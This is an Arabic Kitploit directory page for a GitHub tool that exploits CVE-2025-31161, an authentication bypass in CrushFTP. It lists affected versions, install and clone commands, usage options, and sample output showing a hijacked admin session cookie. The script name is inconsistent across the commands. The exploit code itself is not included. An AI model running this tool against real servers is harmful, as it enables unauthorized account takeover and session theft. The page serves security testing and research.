Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-31161 — أداة استغلال CrushFTP CVE-2025-31161 🔓 | Kitploit
أدوات/GitHubGitHub/tx-one/cve-2025-31161
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHubtx-one/cve-2025-31161

CVE-2025-31161

أداة استغلال CrushFTP CVE-2025-31161 🔓

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال CrushFTP CVE-2025-31161 🔓

أداة متقدمة للكشف والاستغلال لثغرة CVE-2025-31161 في إصدارات CrushFTP المعرضة للخطر.

CVE-2025-31161 هي ثغرة حرجة في تجاوز المصادقة في واجهة الويب الخاصة بـ CrushFTP. من خلال التلاعب بحقل ترويسة Authorization في HTTP، يمكن لمهاجم غير مصادَق الحصول على وصول كامل تحت أي اسم مستخدم صالح دون توفير كلمة المرور الصحيحة.

الإصدارات المتأثرة

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

إصدارات CrushFTP Enterprise قبل 9.3.12.5

الميزات الرئيسية 🚀

  • كشف تلقائي لإصدار CrushFTP والتحقق من الثغرة
  • اختبار بيانات الاعتماد متعدد الخيوط لتعداد المستخدمين بسرعة
  • دعم طريقتين للمصادقة (Bearer Token و Basic Auth)
  • توليد تقارير JSON مع ملفات تعريف الجلسة
  • آليات إعادة محاولة ذكية للاتصال مع إعدادات مخصصة
  • مخرجات وحدة تحكم ملونة مع تسجيل مفصّل
  • تغطية الإصدارات المعرضة للخطر:
    • 9.3.8 حتى 9.3.12.5

المتطلبات 📋

  • Python 3.8+

  • الحزم المطلوبة:

    root@kitploit:~
    pip install requests colorama urllib3
    

    التثبيت 🛠️

  1. تثبيت التبعيات:
root@kitploit:~
 pip install requests colorama urllib3
  1. استنساخ المستودع:
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

الاستخدام 🖥️

الأمر الأساسي:

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

الخيارات:

root@kitploit:~
-h, --help            عرض رسالة المساعدة والخروج
  -t, --target TARGET   عنوان الهدف (مثال: https://example.com:8080)
  -u, --users USERS     ملف يحتوي على قائمة أسماء المستخدمين
  -o, --output OUTPUT   ملف JSON للإخراج
  -T, --threads THREADS
                        عدد الخيوط (الافتراضي: 5)
  --no-ssl              تعطيل التحقق من SSL
  --timeout TIMEOUT     مهلة الطلب (الافتراضي: 15)
  --retries RETRIES     عدد مرات إعادة المحاولة (الافتراضي: 3)
  --force               تجاوز فحص الإصدار

مثال متقدم:

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

نموذج الإخراج 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

إخلاء مسؤولية: هذا المشروع مخصص للأغراض التعليمية وبحوث الأمن فقط. الاستخدام المسؤول مطلوب.

تنزيل الأداة